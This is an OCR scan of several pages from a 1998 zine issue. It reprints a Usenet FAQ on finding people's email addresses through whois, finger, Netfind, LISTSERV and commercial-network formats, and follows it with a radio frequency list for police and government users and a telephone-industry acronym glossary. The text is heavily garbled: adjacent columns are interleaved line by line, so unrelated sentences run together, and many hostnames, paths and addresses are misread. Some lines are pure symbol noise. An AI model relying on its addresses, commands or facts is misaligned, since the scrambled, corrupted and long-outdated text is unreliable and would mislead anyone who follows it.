Note that the usenet-addresses database is accessible via
WebPH @ http://www.middlebury.edul-its/Software/ WAIS (in fact, the script that does mail server searches is
WebPhl is a World-Wide Web interface PH. If a site you are actually just a front-end to a WAIS database) on two different
interested has installed it, you can look up people from that hosts: rtfm.mit.edu and cedar.cic.net. In both cases, the
site by filling in a query form. Unfortunately, there is no database is called "usenet-addresses" and is on port 210.
convention for how to guess where to find the WebPH or PH Note that the version on rtfm is slightly more up-to-date with
server given the site name. respect to the master address list than the version on cedar.
If you don't know what WAIS is, then don't worry about this
Most Gopher servers have pointers to a complete list of ph paragraph; if you're curious, see the "comp.infosystems.wais"
servers used by all sorts of organizations. You can enter newsgroup.
various criteria, in an easy-to-use manner, and it will return
the info that you didn't give (if, of course, there are no more For more details about how to use the database, send the
than 20 entries that match. This is to prevent people getting command "send usenet-addresses/help".
mailing lists via the ph servers.)
Inter-Network Mall Guide
Many of the on-line methods for finding addresses
documented below are easily accessible, with a consistent If you know which network/service your target has an account
user interface , from the Internet Gopher burrow at the on (e.g. CompuServe, Fidonet), then the "Inter-Network Mail
University of Minnesota. If you are on the Internet, you may Guide" posting in comp.mail.misc "may" be able to provide
want to try using Gopher to do your searching before going you with some help, although it probably will not be
directly to any of the methods described below. Ask someone particularly helpful unless you have some sort of address to
at your site to find out if Gopher clients are installed there. Or, start with (a small number of networks use full names as
to find out how to use it and/or install it yourself, see the addresses, and the posting mentions when this is the case,
comp.infosystems.gopher FAQ @ gopher:// but it doesn't apply in very many cases).
mudhoney.mlcro.umn.edu:70/00/Gopher.FAQ posting.
See the instructions below for getting a copy of this posting if
it isn't available in comp.mail.misc at your site.
.Other Techniques
whoislnicname
College and School Email Addresses Entry Changed: Sat C'ec 61997
44 Volume 1 Issue 2· Fall 1998 THUD
Whois is the internet user name directory service. It's Matt H. Power of MIT has
available on some UNIX systems as a command called compiled and maintains an extensive list of sites that run
"whois" or "nicname". Do "whois" servers. The file can be retrieved via anonymous ftp
from Ipub/whoislwhois-servers.list on sipb.mit.edu.
whois help
In addition to E-mail addresses for individuals, "whois"
or servers often also contain contact information about domains.
For example, asking whois.internic.net's server for
nicname -h information about "mit.edu" would tell you to look up "mit-
dom" in order to get information about MITs domain, and
to get a help message. The whois and nicname programs will doing that would give you contact information about the
check the database maintained at rs.internic .net (or people responsible for administrating that domain, including
nic.ddn.mil for U.S. military sites) for the given names. For the handles of those individuals, which you can then look up
example, to get still more information about them.
nicname Other directory services
or There are several other directory services you may be able to
use to search for your target.
whois
The person you are searching for may be using Pobox.com
or @ http://pobox.com/poboxl, which provides permanent
email forwarding addresses You submit to a searchable
whois -h database your real name and some biographical information;
you receive short, memorable email aliases at pobox.com that
where is some site with a whois server. This is only forward to your current real mailbox. Whatever your real
useful for people listed in the database. Many regional address is, you can be found at and mailed through
networks and some universities maintain their own NICs. pobox.com. Pobox.com is growing very quickly and has
amassed a substantial database . To sign up or find a
You can also get some of this information by telneting to subscriber, use the Web address or send mail to
rs.internic.net and running whois and host there, or to info@pobox.com
nic.ddn.mil if you are looking for U.S. military personnel.
Alternatively, you can issue a single command to the Many Bitnet sites have name servers that can be queried in
whois.internic.net server by typing "telnet whois.internic.net one way or another. To get a list of them with documentation,
whois" in order to connect to it and then typing the command send a mail message to listserv@b itnic.bitnet (a.k.a
and hitting return; the "help" command will return several Iistserv@bitnic.educom.edu) with the command "send bitnet
screens full of text, so if you need help, you should use a servers" in the body of the message.
utility such as "tee" or "script" to capture the help message
and save it for future reference. The IBM Corporate Internet Gateway provides a directory of
users (which I believe contains only IBM employees, although
If you do not have Internet access, you can send mail to I'm not certain) that is available to anyone who can send
whois@whois.internic .net to query the "whois" database ; E-mail to it. If your target works for IBM (or you suspect s/he
send a rnessaqe with "help" in the body to find out more does), then this might be useful to you.
information.
To use it, send mail to nic@vnet.ibm.com with the command
Some sites run local "whois" databases to provide information "whois lastname, firstname" in the subject or body of the
about people inside their organizations. The only way to find message. If you are unsure of the spelling of the last name,
out if your site runs such a database is to ask someone locally use an asterisk (") to indicate that the last name should be
about it (see "Get more help locally" below), and the only way treated as a prefix, rather than a complete name. The first
to find out about such databases at other sites (assuming, of name is always treated as a prefix. For example, "whois
course, that those databases are not mentioned in any of the Smith", R" would return all people with a last name starting
other sources listed in this document) is to contact with "Smith" and a first name starting with "R", while "whois
responsible individuals at those sites and ask (see "Finding a Smith, R" would return only those people with exactly the last
host name and asking someone there for help" below). name "Smith" and a first name starting with "R".
Other whois databases Users of the directory are limited to 25 name searches per
day. Each name that results is counted as a separate name
Quite a few other sites also run "whois" databases that can be search. For example, a single "whois Smith, R" that found
connected to over the Internet using the whois protocol (using Rodger Smith, Robert Smith, and Reginald Smith would count
either the "whois" program or "telnet hostname whois" as as three name searches. Multiple requests may be made in a
described in the previous section). Some of those sites are single note provided that the number of names found does not
listed here, and others are listed in a separate list, described exceed the daily limit of 25.
in more detail below.
RPI runs a white pages server for people interested in the
The Ohio State University runs a "whois" database (on the field of communications. To find out how to use it, send mail
machine "osu.edu") that has all of the faculty, staff, and to comserve@rpitsvm .bitnet (or comserve@vm. its.rpi.edu)
students listed. It responds to "whois" queries in the normal with "help" in the body of the message.
fashion, or you can just send mail to
firstname.lastname@osu.edu and it will try to deliver e-mail if BITNIC (the BITNET Network Information Center) runs a
the person has registered an e-mail address. You can also name server of more general interest. To find out how to use
telnet to osu.edu and look-up a person. If you are unsure of it, send mail to netserv@bitn ic.bitnet (again,
the spelling this is a good way, as it does a soundex type netserv@bitnic.educom.edu can also be used) with "help" in
search so exact matches are not necessary. No password is the body of the message.
necessary.
There is an X.500 white pages service run by UNINETT. It is
RIPE (a cooperative group of several European Internet accessible by sending mail to the address
providers) runs a "whois" database, with RIPE information, on Directory@UNINETT.NO (send a message with "help" in the
"whois.ripe .net"; it is a European counterpart to subject or body to get more information). Furthermore, there
"whois.internic.net". is software for UNIX available for use as a convenient
interface to the service. It is available for anonymous ftp in
THUD Volume 1 Issue 2 - Fall 1998 45
-ftp/directory/directory .tar.Z on the machine nac.no. Finally, if http://www.amherst.edu/-atstarr/computerslfinger.html.
the administrator of your site registers your organization with Some sites provide Web-based interfaces to finger, such as
UNINETT (instructions about doing so are available with the Middlebury College @ http://www.mlddlebury.edu/-otisg/
software just mentioned), people from your site can then cgi/HyperFinger.cgi.
register in the database so that other people can look them up
in it. Netfind
KPN Research (formerly PTT Research) in the Netherlands Netfind is a "white pages" service that allows you to query one
runs a server that you can use to look up addresses for its service and have it search several other address databases
employees. If you know someone who may work there, you of various sorts for addresses matching your query. It is a
can find out how to use the server by sending a mail message program for SunOS workstations and requires your computer
to whois@research.kpn.com with "help" in the body of the to be directly connected to the Internet. The source code is
message. Note that this is not a "complete" whois site; it just available by anonymous FTP from ftp.cs.colorado.edu, in
supports limited mail server queries. pub/cs/distribs/netfind.
AT&T Bell Labs runs a mailer on the host "att .corn" that can People without a Sun on which to run Netfind on can telnet to
get mail to about 400 employees in the Research Area of Bell any of the following Netfind servers and log in as "netfind"
Labs using their names as addresses. You can send mail to (with no password):
"Iastname@all.com" or to "initials.lastname@all .com", where
"initials" consists of one or more initials separated by dots. If bruno.cs.colorado.edu University of Colorado. Boulder
the name is ambiguous, you will get a bounce message dino.conicit.ve Nat. Council for Techn. & Scien.
indicating several possible matches, and the appropriate Research Venezuela
address to use for each. ds.internic.net InterNIC Directory and DB
Services, S. Plainfield, NJ
Tim Pozar has set up a WAIS server that contains the Iincoln.technet.sg Technet Unit, Singapore
FidoNet email addresses of Sysops of FidoNet BBSs. You macs.ee.mcgill.ca McGill University, Montreal,
can access it by connecting to the "nodelist" WAIS database Quebec, Canada
on port 210 of kumr.lns.com; use the name(s) for which you malloco.ing.puc.cl Catholic University of Chile,
wish to search as your search keywords. See above for more Santiago
information about WAIS. monolith.cc.ic.ac.uk Imperial College, London,
England
PSI runs a X.500 directory server, accessible by sending mail mudhoney.micro.umn.edu University of Minnesota,
to whitepages@wp.psLcom. Minneapolis
netfind.oc.com OpenConnect Systems, Dallas,
Information about hosts in the "ca" Internet domain (i.e., hosts Texas
in Canada) Is accessible via anonymous ftp to netfind.vslib.cz Liberec University of Technology,
ftp.CDNnet.CA, or by mail to archive- Czech Republic
server@relay.CDNnet.CA. You can get site domain names nic.nm.kr Korea Network Information
and host names, as well as the names and addresses of Center, Taejon, Korea
contact people for individual sites. For more information, nic.uakom.sk Academy of Sciences, Banska
retrieve the file Ica-domain/lntroduction via anonymous ftp, or Bystrica, Slovakia
send a mail message to the mail server with "send ca-domain redmonl.cis.uab.edu University of Alabama at
Introduction" in it. The information in this archive is also Birmingham
available via the Gopher service at nstn.ns.ca @ gopher:1I
nstn .ns .ca. There is a mailing list where new releases of netfind will be
announced; you can subscribe by sending mail to netfind-
Finding a host name and asking someone there for help users-request@cs.colorado.edu.
If you know the organization, company, or whatever at which Netfind was developed by Mike Schwartz
your target's account is likely to be located, then you might be and Panos Tsirigotis
able to get your hands on the host name of a machine at that .
location. Once you've done that, you can usually write to
someone responsible for E-mail support at the site and ask for Knowbot Information Service
help finding the address you are seeking. See the section on
'finding host names' below. The "Knowbot Information Service" (KIS) is another white
pages service.
Once you've got a host name and the person to contact, you
need to figure out how to get the mail there, if it's on a network Two hosts running KIS servers are info.cnrLreston.va.us and
you don't know how to reach. See the "Inter-Network Mail regulus .cs.bucknell.edu. Either can be reached on the
Guide" posting referenced above if you need help with that. Internet via telnet at port 185 (e.g. "telnet
info.cnrLreston.va .us 185"), or via electronic mail
If you do go this route, make sure you provide as much (kis@cnr Lreston.va .us or
information as you can about the person whose address you netaddress@regulus.cs.bucknell.edu). For more information
are seeking; remember that the more detailed (and polite!) about Knowbot, use the "man" command after connecting via
you are, the more likely it is that the person you are contacting telnet or hi the body of your E-mail message. In addition,
will be able to help you. Remember, too, that the person you info.cnri.reston.va.us' KIS server can be reached using the
are contacting is probably very busy, and responding to Internet "whois· protocol described above.
requests like yours is probably not one of his/her highest
priorities, so be patient. Searching L1STSERVmailing lists
Entry Changed: Tue Jul4 1995
Using 'finger'
Entry Changed: Mon Sep 21996 Many sites around the network are running the VM/CMS
L1STSERV package for managing mailing lists. If you have
Finger is a user information lookup program. If you've found a some reason to believe that a particular user may be a
potential host name for your target using one of the other member of a mailing list on a L1STSERV site, you can ask that
methods described here, and if you have direct access to the L1STSERV to send you a membership list and search it for
Internet, then you may be able to use the "finger" program! your target.
protocol to look up your target at a remote site. To finger
someone at another site, you generally type "finger To do this, send mail to Iistserv@host (if "host" is a BITNET
name@host". Andrew Starr maintains the Finger FAQ @ host, try using listserv@hosl.bitnet; if that doesn't work, you'll
46 Volume 1 Issue 2· Fall 1998 THUD
have to ask someone at your site how to send mail to BITNET Finding Host Names
hosts). In the body of your message, include the command
"review list-name", where "list-name" is the name of the Whois
mailing list you wish to search.
The NIC "whois" database mentioned above contains site and
Alternatively, sending mail to the server with the line organization information as well as information about
individuals . Organization entries in the NIC database will
WHOIS usually list an administrative, technical and/or zone contact
person, with his/her address, to whom you can write. You can
may catch the person. For example, listserv@buacca.bu.edu. also write to "postmaster" at almost any Internet host to get in
This is an unlikely option. It also does not work with all listserv touch with someone responsible for E-mail.
implementations.
U. Texas Network Directory
If you don't know what L1STSERV is and dont' know of any The University of Texas publishes a network directory.
L1STSERV sites or mailing lists, then this technique probably Although it hasn't been updated in a few years, it still provides
isn't worth bothering with. a useful list of many site names. It is available for anonymous
ftp from several different locations, including Inet.d irectoryl
Direct contact 1988.netbook on emx.utexas.edu. It is BIG, so you might not
have room to store it locally, unless you ask someone in
If you have a paper mail address or telephone number for charge to set up some space for it. You should NOT transfer
your target, call them or write to them and ask for an E-mail it to Itmp every time you need it, or something like that; that's
address. a horrible waste of network bandwidth. Contact people are
usually listed in the site entries in the net directory , but you
In that case , you might encounter the somewhat common might want to try "postmaster" first. This directory is
situation where your target knows s/he has an E-mail superseded by the book "The user's directory of computer
address, but s/he doesn't know what it is. If this happens to networks," whose bibliography information is provided in the
you, then give him/her your E-mail address and ask him/her to 'References' section below. Of course, you have to pay for the
send you mail (and if s/he can't figure out how, tell him/her to book, and you can't grep dead trees, but it's probably more
get someone at his/her site to help). The odds are that when up-to-date than the University of Texas directory .
you get his/her message, it'll contain a valid return address in
it. UUCP maps
Entry Changed: Tue Jul4 1995
Get more help locally
The UUCP maps are posted in the comp .mail.maps
Often, the postmaster at your site (or whomever is newsgroup . See the posting "UUCP map for README" in that
responsible at your site for answering mail- related questions) directory for more information. You can grep in the news
has a large amount of knowledge that will help him/her to help spool or use your news reader's search facilities to search for
you find the answer to your question. If you have been unable a particular string (e.g. an organization name) in the
to find the answer for yourself, check with people locally and comp.mail.maps postings. Each UUCP map entry lists the
see if one of them can help you out. contact person for the entry. You can also search the UUCP
maps by connecting to the "uumap" WAIS database on port
postmaster 210 of wais.cic.net. For more information about WAIS, see
Entry Changed : Thu Jul1 1993 above.
Most sites have an individual responsible for network and mail Netinfo
operations at the site, usually with the userid of 'postmaster'.
These people are usually very busy, so before bothering one You can also search UUCP maps using the University of
of them, try telephoning the person you are trying to reach. California at Berkeley's Netinfo service (which also supports
Long distance is expensive for you, but less expensive, other services, such as looking up IP addresses for hosts on
globally, than the postmaster's time. The one reasonable the Internet) . You connect to it at port 117 of
exception is if you're sending mail and getting messages in netinfo .berkeley.edu , e.g. on some systems , "telnet
response that suggest some sort of mail system problem; you netinfo.berkeley.edu 117". The "ufind", "ufile", "uhosl" and
might report the problem to postmaster at your own site, who "upath" commands are used to look up information in the
may in turn contact postmaster at the destination site. UUCP maps. For more information about Netinfo, connect to
it and type "?".
Many postmasters will refuse to answer questions about user
identification, for reasons of privacy, though they may be Merit Network NetMail database
willing to forward your address so your intended recipient can
write to you. Allows one to find the appropriate bitnet, internet or uucp
address for a site given part of the address.
The last resort - soc. net-people
telnet hermes.merit.edu
If all the methods above have failed, you can consider posting
a message to soc.net-people asking for help locating your At the "Which Host?" prompt, type netmailsites then enter any
target. Before doing so, however, you should read the "Tips part of the address you want.
on using soc.net-people" posting in that newsgroup. If it has
expired, you can get a copy using the instructions below (note nslooklnslookup and hostq programs
that the name in the instructions below may change when a
new version with a new date is posted, so you may need to Some sites have programs which will give you information
ask for an index of the soc.net-people archive to find out the about a host given its name or IP address . Some such
name of the most recent version). programs include nslook, nslookup, and hostq.
Note that this is listed as THE last resort, to be tried even later letc/hosts
than using a telephone number or paper mail address. Any Entry Changed : Mon Feb 15 1993
posting to the Usenet uses the resources of the sites on the
Usenet and of the networks that carry it; certainly, the total Mail routing on UNIX machines on the internet use to use a
cost of transporting a Usenet message is more than the cost large file called letc/hosts to validate host names. We used to
of a stamp or a short phone call. Since the benefit gained is to advise you to examine this file to guess host names when all
you and not to the Usenet as a whole, you should avoid else fails - but that really isn't useful anymore. Use one of the
posting if you possibly can. above methods instead.
THUD Volume 1 Issue 2· Fall 1998 47
Commercial Networks published in August 1993; $24.95 cover price)
>The Matrix: Computer Networks and Conferencing Systems
Internet to America Online Worldwide , by John S. Quarterman, Digital Press, Bedford,
Entry Changed: Sat Dec 71996 MA, 1990. $50. Digital order number EY-C176E-DP-SS ,
Digital Press ISBN 155558-033-5, Prentice-Hall ISBN 0-13-
Creating the Internet version of an America Online address 565607-9.
requires that you know the conversion rule. You ignore the >"Strategies for Finding People on Networks: by John S.
case, remove the spaces, and add "@aol.com" to the end of Quarterman , Matrix News, Vol. 1, No.6, pg. 3, Matrix
the address. Thus, an America Online address "Jane Doe" Information and Directory Services, Austin, Texas, September
becomes "janedoe@aol.com" (without the quotes, of course). 1991.
Internet mail incoming to America Online is trucated at 27 >The user's directory of computer networks , ed. Tracy L.
kilobytes. To find addreses, send e-mail to LaQuey , Digital Press, Bedford , MA, 1990. Digital order
NameSearch@aol.com and provide the user's real name, number EY-C200E-DP, ISBN 1-55558-047-5.
state, and city. Their World-Wide Web service at http:// >Zen and the Art of the Internet: A Beginner's Guide, by
home.aol.com allows you to search for members' home Brendan Kehoe, Prentice Hall, July 1992. ISBN 0-13-010778-
pages containing the search terms you specify. 6. (This is the second edition. The first edition is available for
free on-line. To find out how to get it, send mail to archive-
Internet to Compuserve server@cs.widener.edu with "send zen hints" in the body of
Entry Changed: Sat Dec 71996 the message.)
If someone's Compuserve 10 is 77777,7777 you can send Useful Usenet Postings
Internet mail to 77777.7777@compuserve.com (change the
comma to a dot, and append the site name). Their Web Subject: FAQ: College Email Addresses 1/4 [Monthly posting]
directory @ http://www.sprynet.com/ourworld/searchow/ Subject: FAQ: College Email Addresses 2/4 [Monthly posting]
I~ts you search for people by name, location, or occupation . Subject: FAQ: College Email Addresses 3/4 [Monthly posting]
Subject: FAQ: College Email Addresses 4/4 [Monthly posting]
Internet to DELPHI Newsgroups: soc.college, soc.net-people, news.answers
Entry Changed: Sat Dec 7 1996 Subject: Updated Inter-Network Mail Guide
Newsgroups: comp.mail.misc, alt.bbs.lists,
Delph i users can recieve Internet EMail at alt.internet.services , comp.misc, comp.answers,
@delphLcom. Usernames are user- defined and alt.answers , news.answers
vary from handles to real names. Their Web directory @ Subject: Tips on using soc .net-people [I.m. 13/09/92]
http://www.delphi.com/dir- Newsgroups : soc.net-people
html/simple_web_search.html lets you search for member
Web pages containing your search terms, or browse their [Same as above - check the archives for a newer version if
username directory. this one isn't available.]
Internet to GEnie Available in the indicated Usenet newsgroup(s), or via
Entry Changed: Sat Dec 7 1996 anonymous ftp from rtfm.mit.edu in the files:
Creating the Internet version of a GEnie address requires that /pub/useneUnews.answerslmaillcollege-emaii/part1
you add "@genie.com" to the end of the address. Thus, a /pub/useneUnews.answers/mail/college-email/part2
GEnie address "J.DOE3" becomes "J.DOE3@genie.com" /pub/useneUnews.answers/mail/college-email/part3
(without the quotes, of course). There is no added cost to /pub/useneUnews.answers/mail/coliege-email/part4
GEnie users (beyond normal connect-time charges) to send Ipub/useneUnews.answers/mail/inter-network-gu ide
or receive Internet mail. GEnie addresses are case- Ipub/usenet/soc.net-people/Tips_on_us ing _soc .net-
insensitive, but you should preserve periods. people_p.m._13_09_92]
Internet to Prodigy Also available from mail-server@rtfm .mit.edu by sending a
Entry Changed: Sat Dec 7 1996 mail message containing any or all of:
Prodigy users receive Internet mail via the address format send useneUnews.answers/mail/coliege-email/part1
send useneUnews.answers/mail/coliege-email/part2
abed12a@prodigy.com send useneUnews.answers/mail/college-email/part3
send useneUnews.answers/mail/college-email/part4
where "abcd12a" is the recipient's Prodigy user 10. We have send useneUnews.answers/mail/inter-network-gu ide
not found an Internet-accessible directory. send useneUsoc.net-peoplelTips_on_using_soc.net-
people_[l.m._13_09_92]
Internet to T-Online (Germany)
Entry Created: Wed Nov 22 1995 Send a message containing "help" to get general information
about the mail server.
Since Summer 1995, T-Online (former BTX) users have
access to the Internet. Use the T-Online Id of the recipient Credits'
and add -OOOx where x is the appropriate user number, mostly
1. The T-Online Id is mostly equal to the telephone-number of This FAQ was originally maintained by Jonathan I. Kamens;
the person, inculding the city prefix. To send a mail to a David Lamb took over maintenance in January 1994. In July
T-Online user in Frankfurt (city prefix: 069), with the telefon 1995 David merged in the general information on finding
number 123456, send Internet mail to 069123456-0001@T - addresses from the College E-mail FAQ, originally created by
Online.de. Mark Kantrowitz .
References Comments about. suggestions about or corrections to this
posting are welcomed . If you would like to ask me to change
If you want to learn more about computer networks and how ' this posting in some way, the method I appreciate most is for
they interact with each other, these books and articles might you to actually make the desired modifications to a copy of
be interesting and useful to you: the posting, and then to send me the modified postiilg, or a
context diff between my posted version and your modified
>!%@:: A Directory of Electronic Mail Addressing & Networks version (if you do the latter, make sure to include in your mail
by Donnalyn Frey and Rick Adams ISBN 1-56592-031-7 the "Version:" line from my posted version). Submitting
(published by O'Reilly, E-mail nuts@ora.com) (current edition changes in this way makes dealing with them easier for me
48 Volume 1 Issue 2 - Fall 1998 THUD
and helps to avoid misunderstandings about what you are Michael Santullo (santullo@Four 11.com)
suggesting. Jenny Schmidt Genny@whowhere.com)
Ellen Keyne Seebacher
These people provided useful comments , information and/or Rolf E. Sonneveld
suggestions: Andrew Starr
Donald Stoy
Randall Atkinson (atkinson@itd.nrt.navy.mil) Robert Ullmann
Ed Blackman Edward Vielmetti
Mark Brader (msb@sq.com) Peter M. Weiss (pmw1@psuvm .psu.edu)
Bruno Chatras Bill Wells
Jim Cheetham Sean White (sean@whowhere .com)
Huang Chih-Hsien Martin Westphal (martin@PNN.sgz-bank .com)
Marcel Dorenbos Bill Wohler (wohler@sap-ag .de)
Alessio Dragoni (drago@ats.it) Peter J. Woodrow
Ralph E. Droms
Donald E. Eastlake, III Copying
Marshall Gene Flax
Arthur K. Ho You can reprint (or archive, or make CDs of) this FAQ posting
Patrick Hoepfner (hoepfner@heasfs .gsfc.nasa.gov) anywhere you want, as long as the following conditions are
Dan Hoey (hoey@aic.nrt.navy.mil) met:
Kjetil Torgrim Homme (kjetilho@ifi.uio .no)
Ivar Mar Jonsson >You use as recent a version of the FAQ as possible .
Jonathan I. Kamens Gik@security.ov.com) >The copyright holders' names (as well as the 'Credits'
Mark Kantrowitz (mkant+@cs.cmu.edu) section listing other people who have contributed) stays on it.
Dan Kegel (dank at alumnLcaltech.edu) >Any modifications (other than typesetting changes) you
Jonathan Kochmer make to it are c1earty designated as your modifications . If you
Patt Leonard (Ieonard@alexia .lis.uiuc.edu) are significantly reformatting the information in the FAQ, then
Jerry Martin (nic@osu.edu) you don't have to explicitly show every change from the
Skip Montanaro original, but you make clear that what you are printing is
Dan Muller (danm@zipnet.net) derived from our FAQ rather than a direct copy of it.
Eric De Mund (ead@ixian.com) >You tell people where to find updated versions of it, i.e., what
Hank Nussbacher (hank@ibm.neUI) newsgroups it appears in. If paying outside authors for articles
Jerry Peek Gpeek@jpeek.com) is standard practice of the forum in which you wish to reprint
Tim Pozar (pozar@kumr.lns .com) it, then we would appreciate some sort of reimbursement for
Mark Prior the reprinting. However, we leave this to your discretion (i.e.,
John S. Quarterman you can pay us or not; if you choose to pay us, the amount
Gowri Ramanathan can be whatever you think is appropriate) .
massive freq uency lis t continued 37.480 Power and Water 38.770 US Forst SvclUS Dept of Agr
from page 42 37.500 Power and Water 38.790 US Dept of Agriculture
37.520 Power and Water 38.810 US Forst Svc
36.510 US Army 37 .540 Power and Water 38 .830 US Army
36.530 US Navy 37.560 Power and Water 38.850 US Army/US Dept of Agr
36.550 US Air Force/US Navy 37.580 Power and Water 38.870 US Dept of Agriculture
36.570 US Government 37.600 Power and Water 38.890 US Army
36 .590 US Government 37.620 Power and Water 38.910 US Army
36.610 US Dept of Agriculture 37 .640 Power and Water 38 .930 US Army/US Navy
36.630 US Army/US Dept of Agr 37.660 Power and Water 38.950 US Air Force/US Army/US Navy
36.650 US Forst SvclUS Dept of Agr 37.680 Power and Water 38.970 US Dept of The Interior/US TVA
36.670 US Forst SvclUS Dept of Agr 37.700 Power and Water 38.990 US D of InVUS TVAIUS Vet Admin
36 .690 US Army 37.720 Power and Water 39.020 Police
36 .710 US Army 37.740 Power and Water 39.040 Police
36.730 US Dept of AgriCUlture 37.760 Power and Water 39.060 Police/Publ ic Serv ice
36.750 US Forst Svc 37.780 Power and Water 39.080 Police
36.770 US ForstSvc 37.800 Power and Water 39.100 PolicelPubl ic Servic e
36.790 US Air Force/US Army/US Dept of Agr 37.820 Power and Water 39.120 Police
36 .810 US Air Force/US Dept of Agr 37 .840 Power and Water 39.140 Police
36.830 US Air Force 37.860 Power and Water 39 .160 Police
36.850 US Navy 37.880 Forest Products 39 .180 PolicelPublic Service
36.870 US Government 37.900 Highway MainVSpecial Emergency 39.200 Police
36 .890 US Army 37.920 Highway Maint 39.220 Police
36 .910 US Army 37.940 Highway MainVSpecial Emergency 39.240 Police
36 .930 US Dept of Agriculture 37.960 Highway Maint 39.260 Police mob ile
36.950 US Dept of Agriculture 37.980 Highway MainVSpecial Emergency 39.280 Police
36.970 US Dept of Agriculture 38 .270 US Government 39.300 Police mob ile
36.990 US Army/US Dept of Agr 38.290 US Government 39 .320 Police
37.020 Police mobile 38.310 US Navy 39.340 Police mobile
37 .040 Police 38.330 US Navy 39.360 Police
37 .060 Police 38.350 US Dept of Agriculture 39.380 Police mobile
37.080 Police 38 .370 US ForstSvc 39.400 Police
37.100 Police/Public Service 38 .390 US Dept of Agriculture 39.420 Police
37.120 Police 38.410 US Forst SvclUS Dept of Agr 39.440 Police
37.140 Police 38.430 US Forst SvclUS Dept of Agr 39.460 Police
37.160 Police 38.450 US Army 39.480 Police
37.180 PolicelPublic Service 38.470 US Government 39.500 PoIicelPublic Serv ice
37.200 Police 38.490 US Army 39.520 PoIiee
37.220 Police 38 .510 US Army 39.540 Police
37.240 Police 38.530 US Army/US Dept of Agr 39.560 Police
37 .260 PoIicelPublic Service 38.550 US ArmylUGFIUS Dept of Agr 39.580 PoIicelPublic Serv ice
37 .280 Police 38.570 US Dept of Agricu lture 39.600 Police
37.300 Police 38.590 US Dept of Agricu lture 39.620 Police
37.300 Police 38.610 US Government 39.640 Police
37.320 Police 38.630 US Government 39.660 Police mobile
37.340 Police 38.650 US Air Force/US Army 39 .680 Police
37 .360 Police 38.670 US Air ForcelUFA 39.700 Police mobile
37.380 Police mobile 38.690 US Army 39.720 Police
37.420 Police mobile 38.710 US Army 39.740 Police mobile
37.440 Forest Products 38.730 US Dept of Agricu lture 39.760 Police
37.460 Power and Water 38.750 US Forst SvclUS Dept of Agr continued on P.O. 53...
THU D Volume 1 Issue 2· Fall 1998 49
00 ~O ~O~ ~ ~O ~O 00 ~ ~ ~ O~ ~O ~OOO ~O ~O~ ~O ~ O O O ~O ~ 0 ~ ~ ~ ~O~OOO~O~O ~ ~ ~O ~ 0 ~ ~ ~O ~O ~ ~ ~OOOO~O ~ ~OO ~O~ ~ 0 ~O ~O ~ 0 ~O~ ~O ~O ~O ~O ~O ~ ~ ~ 0 ~ ~ ~ ~ ~ ~O ~ ~ ~ 0000 ~O ~ O ~ ~ ~ ~O ~ 0 u ~ ~O
LLAcronyms in the letter (11
Another THUD Magazine (non-exclusive> Presentation
~o ~ 0 ~ ~o ioic ~ ~ ~o ~ 0 ic ~ mn0 u ~ 00 ~ ~ ~ ~ ~ ~ ~o~o ~o rocnn~ ~ 00 ~ ~ ~o ~ io ~ ~o~o re ~oo ~ ic ~ ieeeic DODO ~o~o ~o~ ~ ~ io ~ ~ ~ ~ ~ 0 ~o iomen00 icc ~o 00 io ~ ~ ~ ~ ~ ~o ~o ~ ~ io ~ 0 ~ 000
C Counting rate CBERR Correctable bit error
C Current supervision CBS Crossbar switching
C Scan point (SP) CBX Computerized branch exchange
C&A Centrifugal and absorption CC Call count
C-ACO Commercial-automatic call distributor (OSPS) CC Central control
CoNCH C-notch CC Central controller
Cli Command/indicate CC Common channel (CAS-CC)
CIS UNIT Combiner and splitter CC Common control
Cl Circuit system CC Connection confirm
CA Cable CC Country code
CA Cable number CC Country code (ISO 7498)
CA Collision avoidance CC Initials of person closing report out to callas .
CA SSN access INTERITRA blocal 1-26 CC OCC digital facility-med ium speed INTERITRA blocal 1-
CABS Carrier access billing system 26
CAC Calling-eard authorization center CCl Call control 1 (105)
CAC Carrier access code CCA Change customer attributes
CAC Circuit administration center CCA Computer content architecture (ISO 8637/2)
CAC Customer administration center CCBS Completion of call to busy subscribers (i.253 c)
CACHE Cache errors CCC Centeral control complex
CAD Computer-aided dispatch CCC Central control complex
CAD Critical alarm display CCC Clear channel capability
CAON Circuit administration. CCC Computer control center
CAOV Combined alternate datalvoice CCO Change due date - COSMOS command
CAF Circuit reset acknowledgment failure CCOOBOV BVA calling card (CCRO) message received indicating
CAFO Comptrollers automatic message accounting format data base overload
description CCOOBUN BVA CCRO message returned because data base unable
CAFO Controlle rs automatic message accounting format to process
description CCOGMSG BVA CCRO message received garbled
CAl Address incomplete received CCONBLK BVA CCRO message returned because of network
CAl Call assembly index blockage
CAIS Colocated automatic intercept system CCONCON BVA CCRO message returned because of network
CALRS Centralized automatic loop reporting system congestion
CAM Communication access method CCONRTE BVA CCRO message returned because of no routing data
CAM Computer aided manufacturing CCOR Calling card
CAM Content adressable memory CCOTOUT BVA CCRO message returned because of timeout
CAM Control administration module CCOUNEO BVA CCRO message returned because of unequipped
CAMA Central automatic message accounting . destination
CAMA Centralized auto message accounting CCOURPY BVA CCRO message received with an unexpected reply
CAMA Centralized automatic message accounting CCF Custom calling features
CAN Cancel CCH Connections per circuit per hour
CANC Cancel (i.451) Comite' consultatif international des radio
CANF Clear the cancel from CCIR communications
CANT Clear the cancel to Consultative committee for radiocomun ication
CAP Capacitance CCIR intemational radio
CARL Computerized administrative route layout CCIS Common channel interoffice signaling
CAROT Centralized automatic reporting on trunks ccrrr Comile' consultatif intemat ional telegraphique et
CAROT Centralized automatic reporting on trunks. telephon ique
CAS Cannel associated signaling ccrrr Consultative committee for internal. telephone and
CAS Circuit associated signaling telegraph
CAS Computerized autodial system CCM Customer control management
CAS Craft access system (SARTS) CCNC CCS network control
CAS Customer account service CCNC Common channel network controller
CAS7ABM CAS common channel signaling 7 (CCS7) abort message CCNC Computer/commun ications network center
received CCOA Cabinet control and office alarm
CAS7ACG CAS CCS7 ACG invoke component received CCP Call control part
CAS7GMG CAS CCS7 received with invalid format reply CCR Clock configuration register
CAS7GWE CAS CCS7 error CCR Continuity check request (557 : in ISUP)
CAS7NCG CAS CCS7 message returned because of network CCR Customer-controlled reconfigurat ion
congestion CCRC Corrupt ere (10M2 monitor command)
CAS7NFL CAS CCS7 message returned because of network failure CCRO Calling card (5E)
CAS7RCR CAS CCS7 reject component received CCRS Centrex customers ... system
CAS7SCG CAS CCS7 message retumed because of subsystem CCS Centum call Seconds
congestion CCS Cluster support system
CAS7SFL CAS CCS7 message retumed because of subsystem CCS Common channel signal ing
failure CCS Custom calling services (NTI)
